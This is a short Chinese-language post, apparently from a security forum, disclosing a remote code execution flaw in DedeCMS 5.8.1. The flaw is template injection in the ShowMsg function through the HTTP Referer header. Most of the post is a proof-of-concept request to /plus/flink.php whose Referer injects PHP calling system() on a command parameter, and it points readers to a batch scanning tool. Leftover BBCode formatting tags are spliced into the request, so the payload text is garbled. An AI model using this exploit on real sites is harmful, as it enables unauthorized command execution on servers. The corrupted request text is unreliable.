织梦5.8.1 RCE漏洞
在include\common.func.php文件中的ShowMsg函数存在模板注入
- $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
从Referer头中取值,然后进行渲染 造成RCE
- $tpl = new DedeTemplate();
- $tpl->LoadString($msg);
POC:
- GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
- Host: 10.211.55.3[/size][/font][/color][/align][align=left][font=Optima-Regular, Optima, PingFangSC-light
- PingFangTC-light, PingFang SC, Cambria, Cochin, Georgia, Times, Times New Roman, serif][color=#3f3f3
- f]cookie:[/color][/font]PHPSESSID=ferfe1a0k6qd5u9ol5gbd6nieu[/align][align=left][color=rgb(63, 63, 63
- )][font=Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "][size=16px]Referer: <?ph
- p "system"($c);die;/*
如果有人懒的话 可以直接下载现成的PHP批量检测
|
